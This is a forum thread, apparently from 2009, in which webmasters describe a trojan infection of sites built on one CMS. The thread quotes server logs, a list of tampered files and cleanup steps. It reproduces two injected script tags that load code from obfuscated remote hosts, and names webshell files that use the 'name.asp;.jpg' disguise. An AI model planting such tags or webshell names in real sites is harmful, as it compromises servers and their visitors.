网站被挂马的进来看看.是不是都有这样的情况?
本帖最后由 chentaonc 于 2009-8-25 12:55 编辑编辑中!马上上图 晕死不可以上附件~
日志有下列动作:80 POST HTTP/1.1 200 0 171 275 291 0 /css/default.asp;.css - -
80 POST HTTP/1.1 200 0 234 275 319 0 /fckeditor/editor/skins/silver/images/inedx.asp - -
80 POST HTTP/1.1 200 0 218 275 329 0 /fckeditor/editor/dialog/fck_spellerpages/bottum.asp - -
80 POST HTTP/1.1 200 0 187 275 325 0 /fckeditor/editor/plugins/dragresizetable/C00N.asp - -
80 POST HTTP/1.1 200 0 187 275 279 0 /admina/Images/help.asp;.jpg - -
80 GET HTTP/1.1 200 0 156 4274 63 0 /admina/admin_login.asp t=3358 -
80 POST HTTP/1.1 200 0 2421 4671 10841 0 /css/default.asp;.css - -index.asp 被修改
Css/ 文件夹中有个 default.asp;.css
后台 Images/ 文件夹中 help.asp;.jpg
HTML文件中多了 <script id="seraph3script2399" type="text/javascript" src="http://0%3810.6600.org" language="JavaScript"></script>
<script language="JavaScript" type="text/javascript" id="seraph4script9195" src="http://c0812%2E2288%2Eorg"></script>
后台INC文件夹 Admin.jsjs.js 被修改
后台Info/ 文件夹 index.asp被修改
/Templates/文件夹 全部html修改
/Person/文件夹 index.asp 修改
plus/photo/ 文件夹 html修改
/photo/images/xingxiangcat.js修改
/Sideline/index.asp 修改
/Inc/ Keyboard.js 修改
/Js/全部.js修改
/Member/ index.asp top.asp修改
/Onlinepay/chinabank/index.asp
/Onlinepay/ index.asp
/fckeditor/editor/plugins/dragresizetable/ 多了CONN.ASP文件
/fckeditor/editor/skins/silver/images/ 多了index.asp 文件
/fckeditor/editor/dialog/fck_spellerpages/多了 bottum.asp文件
/Count/stat.js文件
/Company/ index.asp文件
Besthr/index.asp
Autohtml/ index.asp
Article/ index.asp
其他地方我继续检查~\
暂时解决办法: 修改所有被修改代码!
关闭空间除Upfiles 目录的写入权限
关闭 Upfiles 目录的执行权限
数据库转移到其他地方.不要在WEB同一目录下!
修改管理员密码. 修改后台地址
IIS日志要明天才可以生成.明天让管理员看看~~~哎 你这里列的比较详细,具体解决办法
http://bbs.yjys.net/thread-21338-1-1.html 希望出补丁 昨天和今天连续两天被挂马,流量受很大影响 怎么回事?我的站也被挂马。和楼主的一样的马!~~
希望出补丁!!!及时解决~~~~~~~ 按照这个一个一个解决吧,哎!
黑客气死我了!
揪住黑客要往死里打! 就是 我的也被挂了 嘉缘的安全怎么一直做不好啊 我的也是昨天被挂木马了,
郁闷死啊,,,
怎么都被挂木马了, 是这样啊,吓死我了,我弄了好几次。
页:
[1]
2